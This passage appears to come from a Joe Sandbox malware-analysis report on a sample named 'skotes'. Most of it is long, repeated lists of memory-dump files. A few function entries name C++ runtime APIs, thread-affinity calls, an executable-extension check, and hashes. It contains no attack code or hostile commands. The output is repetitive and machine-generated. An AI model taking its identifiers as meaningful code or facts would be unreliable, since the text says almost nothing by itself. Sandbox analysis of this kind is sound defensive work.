Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 3f09dd94d348b7a3483b9a59caba58af4f4c2be4a78e14bf43b5777291382ab6
Instruction ID: 0882646e1702e7ce099866fca0eb99d1953932dc5251e32f0fb80d100b432a37
Opcode Fuzzy Hash: 3f09dd94d348b7a3483b9a59caba58af4f4c2be4a78e14bf43b5777291382ab6
Instruction Fuzzy Hash: 99217F70C142098ADF39EFA5C8567EEB7F4BF14322F200929E951A61D1EB724B4CCB50

Function 00971B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00971B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00971B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00971C2A

Strings

switchState, xrefs: 00971B5E
pContext, xrefs: 00971C22

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: a3f5ee6ef074381ba58f8d7464f86861bc24d97e0cecae3cea4c773a2804c3e9
Instruction ID: aa0b05cbd015b46e62389485be1271e018a430a9cce7a0027d91a841236a3e15
Opcode Fuzzy Hash: a3f5ee6ef074381ba58f8d7464f86861bc24d97e0cecae3cea4c773a2804c3e9
Instruction Fuzzy Hash: 4E31A536A00214AFCF05EFACC885AADB379BF84314F24C565ED1997285EB71EE05DB90

Function 0097727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 009772BE

Strings

.exe, xrefs: 009772CB
.bat, xrefs: 009772ED
.cmd, xrefs: 009772DC
.com, xrefs: 009772FE

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: ac59c6c4ea717321e58dc7dae31fb14bb53da8346f0b6eb758ee5eb8ebab7f53
Instruction ID: 9846c00270ef97f7d3518f56d00a636428047f28e7357344cd680106a38e05a1
Opcode Fuzzy Hash: ac59c6c4ea717321e58dc7dae31fb14bb53da8346f0b6eb758ee5eb8ebab7f53
Instruction Fuzzy Hash: 71012B27708A1635661551DCAD42B6A938D8BC1BB8716C02AFC5CF71C1DF44DC4261E0

Function 0095FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0095FB06

Strings

GetThreadGroupAffinity, xrefs: 0095FA93
kernel32.dll, xrefs: 0095FA7A
SetThreadGroupAffinity, xrefs: 0095FA87
GetCurrentProcessorNumberEx, xrefs: 0095FABE

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 35c302207b01d86ad09b3febbe73de1eb610d8b3856f94990ebd97cfa9184dd5
Instruction ID: 010f80f451dc9799dcf2db4d3a662d42920c00326a7dd34f209513de3d650b57
Opcode Fuzzy Hash: 35c302207b01d86ad09b3febbe73de1eb610d8b3856f94990ebd97cfa9184dd5
Instruction Fuzzy Hash: 970168336413122EAB10F7FA5C93BBB32EC9D8231D7310436B802E2142FE64E80986A5

Function 00972097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 009720B7

Part of subcall function 0096CAF3: Mailbox.LIBCMT ref: 0096CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 009720C8
StructuredWorkStealingQueue.LIBCMT ref: 009720FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0097210F

Strings

e, xrefs: 009720D9

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
